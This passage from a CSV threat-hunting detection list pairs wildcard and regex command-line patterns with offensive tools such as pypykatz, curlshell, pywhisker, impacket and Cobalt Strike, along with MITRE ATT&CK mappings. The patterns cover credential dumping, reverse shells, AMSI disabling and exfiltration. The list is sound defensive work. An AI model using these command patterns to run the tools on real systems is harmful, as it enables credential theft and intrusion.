clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.exe -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.exe\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.js -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.js\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.pps -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.pps\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.ppsx -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.ppsx\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.ppt -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.ppt\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.ps1 -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.ps1\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.xll -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xll\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.xls -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xls\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.xlsb -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xlsb\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.xlsm -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xlsm\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py -k * -f *.xlsx -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xlsx\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py rekall *.dmp* -t 0",".{0,1000}\.py\s\srekall\s.{0,1000}\.dmp.{0,1000}\s\-t\s0","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*.py -t *.tpe -c *.exe* -remote-lib *-remote-target *",".{0,1000}\.py\s\s\-t\s.{0,1000}\.tpe\s\-c\s.{0,1000}\.exe.{0,1000}\s\-remote\-lib\s.{0,1000}\-remote\-target\s.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*.py * --fake-server*",".{0,1000}\.py\s.{0,1000}\s\s\-\-fake\-server.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*.py * amsi -disable*",".{0,1000}\.py\s.{0,1000}\samsi\s\-disable.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*.py * amsi -enable*",".{0,1000}\.py\s.{0,1000}\samsi\s\-enable.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*.py * --brop *",".{0,1000}\.py\s.{0,1000}\s\-\-brop\s.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*.py * --burp *",".{0,1000}\.py\s.{0,1000}\s\-\-burp\s.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*.py * coerce -computer *",".{0,1000}\.py\s.{0,1000}\scoerce\s\-computer\s.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*.py * --coerce-to *",".{0,1000}\.py\s.{0,1000}\s\-\-coerce\-to\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*.py * -debug -dnstcp*",".{0,1000}\.py\s.{0,1000}\s\-debug\s\-dnstcp.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*.py * --just-coerce *",".{0,1000}\.py\s.{0,1000}\s\-\-just\-coerce\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*.py * -k -no-pass*",".{0,1000}\.py\s.{0,1000}\s\-k\s\-no\-pass.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*.py * --sql-shell*",".{0,1000}\.py\s.{0,1000}\s\-\-sql\-shell.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*.py * --teamserver *",".{0,1000}\.py\s.{0,1000}\s\-\-teamserver\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*.py *.cs cs ms*",".{0,1000}\.py\s.{0,1000}\.cs\scs\sms.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*.py *.exe *NormalDLL.dll*",".{0,1000}\.py\s.{0,1000}\.exe\s.{0,1000}NormalDLL\.dll.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","0","N/A","N/A","1","15","6","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" "*.py *0.0.0.0*--serve-forever*",".{0,1000}\.py\s.{0,1000}0\.0\.0\.0.{0,1000}\-\-serve\-forever.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*.py *--dependabot-workaround*",".{0,1000}\.py\s.{0,1000}\-\-dependabot\-workaround.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*.py 127.0.0.1 50050 logtracker password*",".{0,1000}\.py\s127\.0\.0\.1\s50050\slogtracker\spassword.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*.py -action add_computer -crt * -key * -domain * -dc-ip * -computer-name * -computer-pass *",".{0,1000}\.py\s\-action\sadd_computer\s\-crt\s.{0,1000}\s\-key\s.{0,1000}\s\-domain\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-computer\-name\s.{0,1000}\s\-computer\-pass\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*.py -aesKey ""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab""*",".{0,1000}\.py\s\-aesKey\s\""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab\"".{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*.py -c -m c2 -p utils*",".{0,1000}\.py\s\-c\s\-m\sc2\s\-p\sutils.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*.py --cached --ntuser NTUSER.DAT*",".{0,1000}\.py\s\-\-cached\s\-\-ntuser\sNTUSER\.DAT.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*.py --certificate *.pem --private-key *.pem --listen-port *",".{0,1000}\.py\s\-\-certificate\s.{0,1000}\.pem\s\-\-private\-key\s.{0,1000}\.pem\s\-\-listen\-port\s.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*.py --certificate fullchain.pem --private-key privkey.pem --listen-port *",".{0,1000}\.py\s\-\-certificate\sfullchain\.pem\s\-\-private\-key\sprivkey\.pem\s\-\-listen\-port\s.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*.py --client ftp --username * --password * --ip * --datatype ssn*",".{0,1000}\.py\s\-\-client\sftp\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-ip\s.{0,1000}\s\-\-datatype\sssn.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*.py --client https --data-size * --ip * --datatype cc*",".{0,1000}\.py\s\-\-client\shttps\s\-\-data\-size\s.{0,1000}\s\-\-ip\s.{0,1000}\s\-\-datatype\scc.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*.py -d ""test.local"" -u ""john"" -p ""password123"" --target ""user2"" --action ""list"" --dc-ip ""10.10.10.1""*",".{0,1000}\.py\s\-d\s\""test\.local\""\s\-u\s\""john\""\s\-p\s\""password123\""\s\-\-target\s\""user2\""\s\-\-action\s\""list\""\s\-\-dc\-ip\s\""10\.10\.10\.1\"".{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py -d * -u * -p * --target * --action * --export PEM*",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\s.{0,1000}\s\-\-export\sPEM.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py -d * -u * -p * --target * --action ""add"" --filename * ",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""add\""\s\-\-filename\s.{0,1000}\s","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py -d * -u * -p * --target * --action ""clear""* ",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""clear\"".{0,1000}\s","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py -d * -u * -p * --target * --action ""info"" --device-id *",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""info\""\s\-\-device\-id\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py -d * -u * -p * --target * --action ""list"" *",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""list\""\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py -d * -u * -p * --target * --action ""remove"" --device-id *",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""remove\""\s\-\-device\-id\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py discover -H domain_list.txt*",".{0,1000}\.py\sdiscover\s\-H\sdomain_list\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*.py enum -H * -U *.txt -P *.txt -*.txt*",".{0,1000}\.py\senum\s\-H\s.{0,1000}\s\-U\s.{0,1000}\.txt\s\-P\s.{0,1000}\.txt\s\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*.py -f *.exe -e -m 4",".{0,1000}\.py\s\-f\s.{0,1000}\.exe\s\-e\s\-m\s4","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*.py --file *.ps1 --server amsi*",".{0,1000}\.py\s\-\-file\s.{0,1000}\.ps1\s\-\-server\samsi.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*.py --host * --type ntlm --output *.lnk*",".{0,1000}\.py\s\-\-host\s.{0,1000}\s\-\-type\sntlm\s\-\-output\s.{0,1000}\.lnk.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","0","N/A","10","4","311","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z" "*.py -k * -f *.doc -o *.html*",".{0,1000}\.py\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.doc\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py lock -H * -u administrator -d *",".{0,1000}\.py\slock\s\-H\s.{0,1000}\s\-u\sadministrator\s\-d\s.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*.py -method BOTH -dc-ip *",".{0,1000}\.py\s\-method\sBOTH\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*.py -method LDAPS -dc-ip *",".{0,1000}\.py\s\-method\sLDAPS\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*.py --ntuser NTUSER.DAT --usrclass 